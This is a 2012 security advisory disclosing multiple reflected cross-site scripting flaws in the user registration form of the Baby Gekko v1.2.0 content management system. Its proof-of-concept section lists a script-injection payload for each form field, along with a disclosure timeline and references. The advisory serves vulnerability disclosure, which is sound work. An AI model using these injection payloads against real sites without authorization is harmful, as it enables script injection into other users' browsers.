Advisory:		Baby Gekko v1.2.0 Multiple XSS vulnerabilities
Advisory ID:		SSCHADV2012-012
Author:			Stefan Schurtz
Affected Software:	Successfully tested on Baby Gekko v1.2.0
Vendor URL:		http://www.babygekko.com/
Vendor Status:		informed

==========================
Vulnerability Description
==========================

Baby Gekko v1.2.0 is prone to multiple Cross-Site scripting vulnerabilities

==================
PoC-Exploit
==================

http://[target]/gekkocms/users/action/register

Reflected XSS (Tested on WinXP with IE8)

Desired Username	'"/><script>alert(1)</script>
E-mail address		'"/><script>alert(2)</script>
Password		'"/><script>alert(3)</script>
Verify Password		'"/><script>alert(4)</script>

First Name		'"/><script>alert(5)</script>
Last Name		'"/><script>alert(6)</script>

Reflected XSS (Tested on WinXP with FF7.0.1 and FF12)

When the username or the e-mail already exists the following XSS are also possible!

Desired Username	<already registered>
E-mail address		<already registered>
Password		'"/><script>alert(1)</script>
Verify Password		'"/><script>alert(2)</script>

First Name		'"/><script>alert(3)</script>
Last Name		'"/><script>alert(4)</script>

=========
Solution
=========

-

====================
Disclosure Timeline
====================

05-May-2012 - vendor informed
05-May-2012 - vendor feedback

========
Credits
========

Vulnerabilities found and advisory written by Stefan Schurtz.

===========
References
===========

http://www.darksecurity.de/advisories/2012/SSCHADV2012-012.txt
http://www.babygekko.com/forum/index.php/topic,349.0.html
http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5086.php
http://secunia.com/advisories/49023/
http://www.exploit-db.com/exploits/18827/